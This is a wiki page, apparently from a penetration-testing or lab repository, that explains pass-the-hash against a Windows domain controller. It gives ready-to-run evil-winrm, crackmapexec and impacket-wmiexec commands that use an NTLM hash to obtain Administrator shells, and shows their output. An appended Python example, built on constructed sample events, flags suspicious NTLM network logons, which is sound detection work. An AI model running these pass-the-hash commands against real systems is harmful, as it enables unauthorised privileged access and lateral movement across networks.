Pass the Hash
Maximilian Birnbacher edited this page Apr 23, 2024 · 1 revision
After finding a hash for an account with elevated or otherwise desired privileges, perform a pass-the-hash (PtH) to log on as that user.
Example hash: e52d9c51eade9526fb936c716ec3dde1
evil-winrm is a simple, easy-to-use tool that connects to the remote management (WinRM) port and gives you a shell.
evil-winrm -i 172.27.12.20 -u 'Administrator' -H 'e52d9c51eade9526fb936c716ec3dde1'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
crackmapexec does not create a shell, but it can be used to validate whether a PtH is possible.
crackmapexec smb 172.27.12.20 -u Administrator -H e52d9c51eade9526fb936c716ec3dde1
SMB 172.27.12.20 445 TOPHACK-DC [*] Windows 10.0 Build 17763 x64 (name:TOPHACK-DC) (domain:tophack.local) (signing:True) (SMBv1:False)
SMB 172.27.12.20 445 TOPHACK-DC [+] tophack.local\Administrator:e52d9c51eade9526fb936c716ec3dde1 (Pwn3d!)
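crackmapexec is mostly built on impacket. Its default execution method is wmiexec, which can also be used standalone. Here the hash is passed in LM:NT form; aad3b435b51404eeaad3b435b51404ee is the LM hash of an empty password and serves as a placeholder.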
impacket-wmiexec tophack.local/Administrator@172.27.12.20 -hashes aad3b435b51404eeaad3b435b51404ee:e52d9c51eade9526fb936c716ec3dde1
Impacket v0.11.0 - Copyright 2023 Fortra
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>
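
On the target, each of the logons above is recorded as a Security event 4624 with logon type 3 (network) and the NTLM authentication package. The following is an added example, not part of the original wiki page: it filters such events for privileged accounts arriving from a source outside an approved set. The event records are constructed sample data, and the `PRIVILEGED` and `ADMIN_SOURCES` sets are assumptions to adapt to your environment.

```python
from collections import Counter

# Constructed Security-log 4624 records (field subset); not taken from a real host.
EVENTS = [
    {"EventID": 4624, "TargetUserName": "Administrator", "LogonType": 3,
     "AuthenticationPackageName": "NTLM", "IpAddress": "172.27.12.99"},
    {"EventID": 4624, "TargetUserName": "Administrator", "LogonType": 3,
     "AuthenticationPackageName": "NTLM", "IpAddress": "172.27.12.99"},
    {"EventID": 4624, "TargetUserName": "Administrator", "LogonType": 3,
     "AuthenticationPackageName": "Kerberos", "IpAddress": "172.27.12.10"},
    {"EventID": 4624, "TargetUserName": "Administrator", "LogonType": 3,
     "AuthenticationPackageName": "NTLM", "IpAddress": "172.27.12.10"},
    {"EventID": 4624, "TargetUserName": "jdoe", "LogonType": 3,
     "AuthenticationPackageName": "NTLM", "IpAddress": "172.27.12.55"},
    {"EventID": 4624, "TargetUserName": "Administrator", "LogonType": 2,
     "AuthenticationPackageName": "Negotiate", "IpAddress": "-"},
    {"EventID": 4634, "TargetUserName": "Administrator"},
]

PRIVILEGED = {"administrator"}      # assumption: accounts worth alerting on
ADMIN_SOURCES = {"172.27.12.10"}    # assumption: approved admin workstation

def suspicious_ntlm_logons(events, privileged=PRIVILEGED, allowed=ADMIN_SOURCES):
    """Return 4624 network logons (type 3) over NTLM by privileged accounts
    that come from a source address outside the approved set."""
    hits = []
    for ev in events:
        if ev.get("EventID") != 4624 or ev.get("LogonType") != 3:
            continue
        if str(ev.get("AuthenticationPackageName", "")).upper() != "NTLM":
            continue
        if str(ev.get("TargetUserName", "")).lower() not in privileged:
            continue
        if ev.get("IpAddress") in allowed:
            continue
        hits.append(ev)
    return hits

def by_source(hits):
    """Count hits per (source address, account) for triage."""
    return Counter((h["IpAddress"], h["TargetUserName"].lower()) for h in hits)

if __name__ == "__main__":
    for (src, user), n in by_source(suspicious_ntlm_logons(EVENTS)).items():
        print(f"{n} NTLM network logon(s) as {user} from {src}")
```

This is a triage heuristic, not proof of PtH: legitimate NTLM logons from unlisted hosts will also match, so the approved-source set needs to reflect how administration is really done.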